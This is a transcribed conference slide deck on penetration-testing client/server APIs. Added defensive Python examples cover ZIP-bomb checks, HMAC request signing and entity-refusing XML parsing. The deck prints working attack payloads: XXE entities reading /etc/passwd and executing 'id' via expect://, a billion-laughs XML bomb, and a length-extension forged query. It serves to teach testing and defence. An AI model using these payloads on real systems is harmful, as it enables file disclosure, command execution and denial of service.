CodeFest 2014 - Pentesting client/server API
Sergey Belov
http://2014.codefest.ru/lecture/696
1.
Pentesting client/server API
Sergey Belov
2.
$ whoami
© 2002—2014, Digital Security
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
3–4.
What are we talking about? API
5.
Hacking via API
6.
(no transcribed text)
7.
From interface to API methods
8–11.
(no transcribed text)
12.
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop hacks and custom implementation in API! Really
13.
(no transcribed text)
14.
ZIP
15–19.
42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb!
http://www.unforgettable.dk/
20.
Say HELLO to ZIP BOMB!
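The slides show the 42 Kb archive that expands to 4.5 Pb; what an API that accepts uploads needs is a check run before extraction. This is an added example, not code from the talk: it reads the central directory for the declared sizes and ratio, then extracts with a hard byte budget so that lying headers are caught too. The policy limits and the two sample archives are constructed for the demo.

```python
"""Pre-extraction checks against ZIP bombs (added example; not from the slides).

Assumptions (not from the original deck): an API endpoint accepts uploaded ZIP
archives and must refuse ones whose declared size, compression ratio, or actual
expanded size exceeds a policy limit. Only the standard library is used."""
import io
import zipfile

MAX_TOTAL_UNCOMPRESSED = 8 * 1024 * 1024   # 8 MiB policy limit (assumed value)
MAX_RATIO = 100                            # uncompressed : compressed (assumed)
CHUNK = 64 * 1024


def inspect_zip(data: bytes) -> dict:
    """Read only the central directory and sum the *declared* sizes.
    Cheap, but these headers are attacker-controlled, so this is a first filter."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    compressed = sum(i.compress_size for i in infos)
    declared = sum(i.file_size for i in infos)
    if compressed:
        ratio = declared / compressed
    else:
        ratio = float("inf") if declared else 0.0
    return {"members": len(infos), "compressed": compressed,
            "declared": declared, "ratio": ratio}


def is_safe_to_extract(data: bytes) -> bool:
    """Policy decision on the declared numbers alone."""
    info = inspect_zip(data)
    return (info["declared"] <= MAX_TOTAL_UNCOMPRESSED
            and info["ratio"] <= MAX_RATIO)


def extract_bounded(data: bytes, limit: int = MAX_TOTAL_UNCOMPRESSED) -> dict:
    """Stream each member and stop as soon as the *actual* output passes `limit`.
    This catches archives whose headers under-report their size; a caller that
    recurses into nested archives should pass the remaining budget down."""
    out, total = {}, 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            buf = io.BytesIO()
            with zf.open(info) as member:
                while chunk := member.read(CHUNK):
                    total += len(chunk)
                    if total > limit:
                        raise ValueError(
                            f"expanded output exceeded {limit} bytes at {info.filename}")
                    buf.write(chunk)
            out[info.filename] = buf.getvalue()
    return out


def make_zip(members: dict) -> bytes:
    """Build an in-memory ZIP; used here only to construct sample inputs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed samples: an ordinary upload and a single-layer "bomb" of zeros.
NORMAL_ZIP = make_zip({"report.bin": bytes(range(256)) * 4})
BOMB_ZIP = make_zip({"zeros.bin": b"\x00" * (16 * 1024 * 1024)})   # 16 MiB -> ~16 KiB


if __name__ == "__main__":
    for label, blob in (("normal", NORMAL_ZIP), ("bomb", BOMB_ZIP)):
        info = inspect_zip(blob)
        print(f"{label}: {len(blob)} bytes on the wire, declares {info['declared']} "
              f"bytes, ratio {info['ratio']:.0f}:1, safe={is_safe_to_extract(blob)}")
```

The declared-size check is what stops a nested bomb cheaply; the streaming budget is what stops an archive whose central directory simply lies.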
21.
The evil of JavaScript and
22–23.
(no transcribed text)
24.
http://habrahabr.ru/post/186160/
25.
Crypto
26.
Query signing: Sign = sha*(…+DATA+…) APIkey
27.
(no transcribed text)
28.
But why?
29.
Say hello again. To length extension attack
30.
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
31.
Suppose someone has hijacked just one request…
32.
What does the attacker know?
• Original data
• Sign (token)
33.
What does the attacker want? Change some data / change params
34.
A=1&B=2&C=3\x80\x00\x00…\x02&C=4
35.
Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
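Slides 30 to 35 show why TOKEN = sha1(KEY+DATA) lets a captured (data, token) pair be extended without the key. As an added example, not the talk's code, here is that scheme beside the server-side replacement a reviewer would ask for: HMAC over a canonical query, with duplicated parameters (the trailing &C=4 of slide 34) refused and a constant-time comparison. API_KEY and the queries are constructed demo values.

```python
"""Request signing: the extendable sha1(KEY + DATA) scheme from the slides beside an
HMAC-based replacement (added example; not the deck's code).

Assumptions (not from the original talk): API_KEY is a constructed demo secret,
the query is a URL-encoded byte string, and the server holds one key per client."""
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

API_KEY = b"demo-secret-key-not-real"      # constructed placeholder secret


def legacy_sign(key: bytes, data: bytes) -> str:
    """Slide 30 scheme: TOKEN = sha1(KEY + DATA). A plain hash over key||data
    exposes the hash's internal state in the token, which is what makes the
    appended-padding query of slide 34 signable without the key."""
    return hashlib.sha1(key + data).hexdigest()


def canonical_query(raw: bytes) -> bytes:
    """Parse and re-serialise the query so that what is signed is exactly what the
    application will read. Repeated names are rejected outright instead of letting
    'last one wins' decide which C the handler sees."""
    pairs = parse_qsl(raw.decode("utf-8"), keep_blank_values=True,
                      strict_parsing=True)
    names = [k for k, _ in pairs]
    if len(names) != len(set(names)):
        raise ValueError("duplicate parameter in query")
    return urlencode(sorted(pairs)).encode("utf-8")


def hmac_sign(key: bytes, data: bytes) -> str:
    """Replacement: HMAC-SHA256 over the canonical query. HMAC's outer hash means
    the token reveals no extendable state, and the canonical form pins down the
    exact parameter set that was signed."""
    return hmac.new(key, canonical_query(data), hashlib.sha256).hexdigest()


def hmac_verify(key: bytes, data: bytes, token: str) -> bool:
    """Server-side check. Malformed or duplicated parameters are refused rather
    than guessed at; compare_digest avoids leaking the token through timing."""
    try:
        expected = hmac_sign(key, data)
    except ValueError:          # includes UnicodeDecodeError on raw padding bytes
        return False
    return hmac.compare_digest(expected, token)


if __name__ == "__main__":
    query = b"A=1&B=2&C=3"
    print("legacy token :", legacy_sign(API_KEY, query))
    token = hmac_sign(API_KEY, query)
    print("hmac token   :", token)
    print("tampered C=4 :", hmac_verify(API_KEY, b"A=1&B=2&C=4", token))
    print("padding + C=4:", hmac_verify(API_KEY, b"A=1&B=2&C=3\x80\x00\x02&C=4", token))
```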
36.
Request hijacking… How?
37–44.
(no transcribed text)
45.
XML? XML entities!
46.
DTD example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>
47.
XML entities? External Entity!
48.
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
49.
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "expect://id" >]>
<foo>&xxe;</foo>
50.
XML Bombs!
51.
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
52.
What are we talking about? Man in the Middle
53.
Examples?
54.
2013-11-19 by Reginaldo Silva
55.
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
56.
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
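Slide 56's development advice is "disable entities". As an added example (not code from the talk), this is one way to do that with only the standard library: a first pass with a bare expat parser that refuses the document at the first entity declaration, internal (slide 51's lolz bomb) or external (slides 48 and 49), and never hands external references to a loader; only then is the body parsed for the application. The three sample documents are the deck's own snippets plus one constructed safe request.

```python
"""Hardened XML intake for an API endpoint (added example; not the deck's code).

Assumptions (not from the original slides): requests arrive as bytes and are
parsed with the standard library only. Any DTD-declared entity, internal or
external, makes the document invalid before the body is ever expanded."""
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document declares entities or is otherwise refused."""


def reject_entities(data: bytes, max_bytes: int = 1 << 20) -> None:
    """First pass: refuse on the *declaration*, so neither a nested internal
    entity chain nor a SYSTEM entity is ever expanded. The size cap bounds
    the cost of this pass itself (limit value is an assumption)."""
    if len(data) > max_bytes:
        raise UnsafeXML(f"document larger than {max_bytes} bytes")
    p = expat.ParserCreate()
    # Never fetch parameter entities or external DTD subsets.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        kind = "external" if system_id is not None else "internal"
        raise UnsafeXML(f"{kind} entity declaration '{name}' is not allowed")

    def on_external_ref(context, base, system_id, public_id):
        # expat only resolves external entities through this handler; we refuse.
        raise UnsafeXML(f"external entity reference to {system_id!r} refused")

    p.EntityDeclHandler = on_entity_decl
    p.ExternalEntityRefHandler = on_external_ref
    try:
        p.Parse(data, True)
    except expat.ExpatError as e:
        raise UnsafeXML(f"malformed XML: {e}") from e


def is_acceptable(data: bytes) -> bool:
    """Boolean wrapper for callers that only need the decision."""
    try:
        reject_entities(data)
        return True
    except UnsafeXML:
        return False


def parse_api_xml(data: bytes) -> ET.Element:
    """Validate first, then parse with ElementTree for the application."""
    reject_entities(data)
    return ET.fromstring(data)


# Sample inputs: one constructed ordinary request, two payloads from the slides.
SAFE_DOC = b'<?xml version="1.0"?><order><item sku="A-1" qty="2"/></order>'
XXE_DOC = (b'<!DOCTYPE foo [ <!ELEMENT foo ANY > '
           b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>')
BOMB_DOC = (b'<?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol"> '
            b'<!ELEMENT lolz (#PCDATA)> '
            b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> '
            b'<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> '
            b']><lolz>&lol2;</lolz>')


if __name__ == "__main__":
    for label, doc in (("safe", SAFE_DOC), ("xxe", XXE_DOC), ("bomb", BOMB_DOC)):
        try:
            root = parse_api_xml(doc)
            print(f"{label}: accepted, root <{root.tag}>")
        except UnsafeXML as e:
            print(f"{label}: rejected ({e})")
```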
57.
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]
58.
Hacking via API
Thanks for your attention! Questions?
twitter.com/sergeybelove
sbelov@dsec.ru
Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47